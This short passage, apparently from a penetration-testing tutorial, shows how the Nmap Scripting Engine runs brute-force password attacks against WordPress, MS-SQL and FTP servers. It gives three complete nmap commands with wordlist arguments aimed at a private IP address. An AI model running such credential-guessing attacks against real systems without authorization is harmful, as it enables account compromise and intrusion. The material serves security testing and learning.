NSE is really fascinating – it contains scripts for everything you can imagine. See the next three examples of BFA against WordPress, MSSQL, and FTP server:
WordPress brute force attack:
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
Brute force attack against MS-SQL:
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
FTP brute force attack:
nmap --script ftp-brute -p 21 192.168.1.105